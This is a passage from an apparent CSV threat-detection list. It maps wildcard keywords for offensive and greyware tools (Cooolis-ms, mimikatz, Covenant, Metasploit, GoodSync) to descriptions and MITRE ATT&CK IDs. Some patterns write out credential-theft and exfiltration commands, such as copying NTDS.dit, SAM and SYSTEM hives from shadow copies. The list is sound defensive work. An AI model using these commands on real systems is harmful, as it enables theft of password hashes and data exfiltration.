Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A",,"N/A",,, +"*coolv0.1.exe*","offensive_tool_keyword","C2 related tools","An anti-virus platform written in the Golang-Gin framework with built-in BypassAV methods such as separation and bundling.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Ed1s0nZ/cool","1","1","N/A","10","10","668","113","2023-07-13T07:04:30Z","2021-11-10T14:32:34Z" +"*Cooolis*shellcode*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*CooolisAdjustTokenPrivileges*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*CooolisCreateRemoteThread*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*Cooolis-ExternalC2*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*Cooolis-ms.exe*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*Cooolis-msf*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*Cooolis-msX64.zip*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*Cooolis-msX86.zip*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*Cooolis-Reflective*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*Cooolis-Shellcode*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*Cooolis-String.*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*CooolisVirtualAlloc*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*copy *\legit.sys *Windows\System32\Drivers\*.sys*","offensive_tool_keyword","unDefender","Killing your preferred antimalware by abusing native symbolic links and NT paths.","T1562.001 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/APTortellini/unDefender","1","0","N/A","10","4","309","78","2022-01-29T12:35:31Z","2021-08-21T14:45:39Z" +"*copy *\NTDS\ntds.dit *\Temp\*.*","greyware_tool_keyword","copy","the actor creating a Shadow Copy and then extracting a copy of the ntds.dit file from it.","T1003.001 - T1567.001 - T1070.004","TA0005 - TA0003 - TA0007","N/A","Volt Typhoon","Credential Access","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*copy *NTDS\NTDS.dit*Temp*","greyware_tool_keyword","copy","copy the NTDS.dit file from a Volume Shadow Copy which contains sensitive Active Directory data including password hashes for all 
domain users","T1003.003","TA0009","N/A","N/A","Collection","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*copy *sam.hive \\*","greyware_tool_keyword","reg","the commands are used to export the SAM and SYSTEM registry hives which contain sensitive Windows security data including hashed passwords for local accounts. By obtaining these hives an attacker can attempt to crack the hashes or use them in pass-the-hash attacks for unauthorized access.","T1003.002","TA0009","N/A","N/A","Collection","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*copy *system.hive \\*","greyware_tool_keyword","reg","the commands are used to export the SAM and SYSTEM registry hives which contain sensitive Windows security data including hashed passwords for local accounts. By obtaining these hives an attacker can attempt to crack the hashes or use them in pass-the-hash attacks for unauthorized access.","T1003.002","TA0009","N/A","N/A","Collection","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*copy \*\HarddiskVolumeShadowCopy1\windows\system32\config\sam C:\*","offensive_tool_keyword","AD exploitation cheat sheet","Dumping secrets from a Volume Shadow Copy We can also create a Volume Shadow Copy of the SAM and SYSTEM files (which are always locked on the current system) so we can still copy them over to our local system. 
An elevated prompt is required for this.","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*copy \*\HarddiskVolumeShadowCopy1\windows\system32\config\system C:\*","offensive_tool_keyword","AD exploitation cheat sheet","Dumping secrets from a Volume Shadow Copy We can also create a Volume Shadow Copy of the SAM and SYSTEM files (which are always locked on the current system) so we can still copy them over to our local system. An elevated prompt is required for this.","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Copy New *gdrive://www.googleapis.com/GS_Sync/*","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","N/A","9","10","N/A","N/A","N/A","N/A" +"*Copy New *sftp://*","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","N/A","9","10","N/A","N/A","N/A","N/A" +"*CopyAndPasteEnum.bat*","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","1","N/A","N/A","8","710","185","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z" +"*CopyAndPasteFileDownloader.bat*","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - 
T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","1","N/A","N/A","8","710","185","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z" +"*Copy-Item -Path * -Destination \\$IP\transfer*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*Copyright (c) 2007 - 2021 gentilkiwi (Benjamin DELPY)*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*Copyright (c) 2023 whoamianony.top*","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","N/A","8","5","402","52","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z" +"*core/handler/reverse*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*core/sprayers/lync.py*","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","1","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" +"*core/teamserver/stagers/*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"*CoreSecurity/impacket/*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*Corrupted MAC on input*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4103","1020","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" +"*corscanner -i urls.txt -t 100*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*Could not set file modification time.*","greyware_tool_keyword","vsftpd","Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by 
exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dagwieers/vsftpd/","1","0","greyware tool - risks of False positive !","N/A","1","47","66","2020-11-10T13:07:55Z","2013-06-13T10:11:54Z" +"*Could not write NTLM Hashes to the specified JTR_Dump_Path *","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*Couldn't clone GPO {} (maybe it does not exist?*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*couldn't handle sandbox event*","greyware_tool_keyword","vsftpd","Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dagwieers/vsftpd/","1","0","greyware tool - risks of False positive !","N/A","1","47","66","2020-11-10T13:07:55Z","2013-06-13T10:11:54Z" +"*Covenant.API*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*Covenant.csproj*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - 
T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*Covenant.exe*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*Covenant.Models*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - 